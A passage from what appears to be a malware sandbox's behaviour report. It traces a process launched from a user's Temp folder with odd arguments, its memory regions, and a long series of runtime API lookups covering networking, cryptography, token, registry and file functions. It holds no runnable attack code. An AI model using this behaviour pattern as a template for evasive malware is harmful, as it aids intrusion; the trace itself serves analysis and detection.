[0100.942] GetEnvironmentStringsW () returned 0x4d24f0* [0100.942] FreeEnvironmentStringsW (penv=0x4d24f0) returned 1 [0100.942] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0100.942] GetEnvironmentStringsW () returned 0x4d24f0* [0100.942] FreeEnvironmentStringsW (penv=0x4d24f0) returned 1 [0100.942] DeleteProcThreadAttributeList (in: lpAttributeList=0x30ee90 | out: lpAttributeList=0x30ee90) [0100.942] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.942] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.943] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.943] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.943] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.943] SetConsoleInputExeNameW () returned 0x1 [0100.943] GetConsoleOutputCP () returned 0x1b5 [0100.943] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.943] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.943] exit (_Code=0) Process: id = "17" image_name = "nhsgkr2p.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe" page_root = "0x7ea16860" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xb4c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1092 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1093 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1094 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1095 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1096 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1097 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1098 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1099 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1100 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1149 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1150 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1151 start_va = 0x240000 end_va = 0x2a6fff entry_point = 0x240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1152 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1153 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1154 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1155 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1156 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1157 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1158 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1159 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1160 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1161 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1162 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1163 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1164 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1165 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1166 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1167 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1168 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1169 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1170 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1255 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1256 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1257 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 1258 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1259 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1260 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1261 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1262 start_va = 0x1440000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1263 start_va = 0x1630000 end_va = 0x18fefff entry_point = 0x1630000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1264 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 1265 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1315 start_va = 0x2d0000 end_va = 0x2e0fff entry_point = 0x2d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1316 start_va = 0x1440000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1317 start_va = 0x15f0000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 1318 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1319 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1320 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1321 start_va = 0x1900000 end_va = 0x1a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1322 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1323 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1332 start_va = 0x1900000 end_va = 0x19fffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1333 start_va = 0x1a20000 end_va = 0x1a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 1334 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1335 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 20 os_tid = 0xb78 [0096.863] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0096.863] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0096.863] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0096.864] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0096.865] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0096.866] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0096.867] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0096.868] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0096.868] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0096.869] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0096.869] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0096.870] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0096.871] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0096.872] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0096.872] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0096.873] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0096.873] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0096.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0096.873] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0096.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0096.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0096.874] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0096.874] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0096.874] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0096.874] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0096.874] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0096.874] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0096.874] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0096.874] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0096.874] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0096.874] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0096.874] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0096.874] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 